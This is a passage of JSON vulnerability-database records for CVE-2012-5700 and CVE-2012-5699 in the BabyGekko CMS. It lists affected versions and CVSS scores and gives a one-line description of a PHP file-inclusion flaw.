["CVE-2012-5700"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:babygekko:baby_gekko:0.98", "cpe:/a:babygekko:baby_gekko:0.91", "cpe:/a:babygekko:baby_gekko:1.1.2", "cpe:/a:babygekko:baby_gekko:1.0.0", "cpe:/a:babygekko:baby_gekko:1.1.4", "cpe:/a:babygekko:baby_gekko:0.99", "cpe:/a:babygekko:baby_gekko:1.1.3", "cpe:/a:babygekko:baby_gekko:1.2.0", "cpe:/a:babygekko:baby_gekko:1.2.2", "cpe:/a:babygekko:baby_gekko:1.1.1", "cpe:/a:babygekko:baby_gekko:1.0.1", "cpe:/a:babygekko:baby_gekko:1.1.5", "cpe:/a:babygekko:baby_gekko:0.90", "cpe:/a:babygekko:baby_gekko:1.1.0"], "id": "CVE-2012-5700", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5700", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:babygekko:baby_gekko:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:0.99:beta:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.2:a:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:0.98:alpha:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.2:e:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.2:d:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:23:25", "description": "BabyGekko before 1.2.4 allows PHP file inclusion.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-23T15:15:00", "type": "cve", "title": "CVE-2012-5699", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5699"], "modified": "2020-01-29T20:19:00", "cpe": [], "id": "CVE-2012-5699", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5699", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}
Multiple vulnerabilities in BabyGekko
